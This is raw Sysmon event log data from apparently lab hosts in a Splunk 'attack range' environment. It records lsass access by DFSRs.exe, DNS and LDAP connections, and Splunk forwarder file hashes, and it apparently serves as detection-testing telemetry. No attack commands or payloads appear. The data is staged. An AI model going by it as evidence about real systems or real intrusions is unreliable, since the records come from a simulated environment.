14:20:41.286{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000044646Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:40.391{0A5DF930-E35C-6299-1600-000000006002}1244C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal60953-false10.0.1.14-53domain 23542300x800000000000000044645Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:42.924{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E9636A361D95B2B095B06172BEA1A4,SHA256=883357FD14515E1DDA5FC64E975EB7C81AAB9E99A35901E36F34E4FB118BD83B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.971{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.968{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.968{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.702{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FB7EEF4F9C12FCA8CC060E5F4A2A7F5,SHA256=D8E54214399F48DCB387588471369B63B83FCB755B596D2F3B384C9ED8A4EA4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.774{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56410-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.774{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56410-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.473{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57526-true2001:500:1:0:0:0:0:53-53domain 354300x8000000000000000205859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.473{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-64729-true2001:500:9f:0:0:0:0:42l.root-servers.net53domain 354300x8000000000000000205858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.473{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-65137-false127.0.0.1-53domain 354300x8000000000000000205857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.473{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.473{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000205855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.859{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56409-false10.0.1.12-8000- 354300x8000000000000000205854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.244{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local59526-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000205853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.232{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16030FF5667753CC51D04C0F250D4F6E,SHA256=F196788410DEDC6890759904F68A30378848D86C85E223CBC32B36357443A825,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.133{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.133{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.133{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.017{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3BFB3A30D4D5E7B108485BAEAD15313D,SHA256=FC68527B9C0AED603B46652F8E8C2447CCA4477078C736E3F9D0D66CC1CB2734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:43.787{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC8A63E32A21A93CA821B95EFA895D4,SHA256=1C044987C5D942A626E27B1F03A2C5071302BE848C632EC52BCCBA532EF303BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.754{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local49807-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.754{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local65137-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.745{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56412-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.745{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56412-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.327{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local58942-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.920{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local53082-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.919{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-58942-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000205870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.919{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local58942-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.899{2E1864BB-E13E-6299-0D00-000000005F02}912C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56411-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 354300x8000000000000000205868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.899{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local56411-truefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local135epmap 23542300x8000000000000000205867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:43.333{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:44.833{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94AA24971FFD1F5DD18CE28B0B78F9BD,SHA256=433134E1F5E31D80F5C091A44F88B0C51CEB26476D5A9CDE8A9783050C3DD705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044647Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:44.018{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3598E52E6899C59A56091319236AE0F6,SHA256=FC4FDC46C48CE749F7EFF4C243EE980EB6671F4F32BF1DCDBD858E89D5D1DB39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.575{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56413-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.575{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56413-false10.0.1.14win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000205884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.289{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65521-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.289{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62891-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.159{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local49807-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.911{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62891-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.911{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65521- 354300x8000000000000000205879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.911{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65521-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000205889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:45.885{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35ECD2F6BEE2E2F4A0CA46A1D50F84C,SHA256=585D2D15ED303B29D3ECD37DB36DC8C5971CC70732BE6579510A3E0DACE71934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044648Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:45.112{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=888905A622B380CA182C3EAD9701036B,SHA256=6A0CB6A29F0130DCE428BB73ED95EFD82C1F6EBDD90AE8729BCEAD04D8748237,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:42.928{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56414-false10.0.1.12-8089- 23542300x8000000000000000205890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:46.967{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2E1B0ED31646D20CE3FF168C689D326,SHA256=A4C3CC2A315FBD03CFEA0F453ADBBC4D6AC41BC320791EEE788E5E7FDB24149F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044650Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:46.205{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=814B8F135146617F2BA9512DC9C75557,SHA256=957F749280B57A5E2DE3508C64594C0BC89E64B73614628875DC14AA72B7F053,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044649Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:42.791{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52375-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000044664Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18BF-629A-2907-000000006002}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044663Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 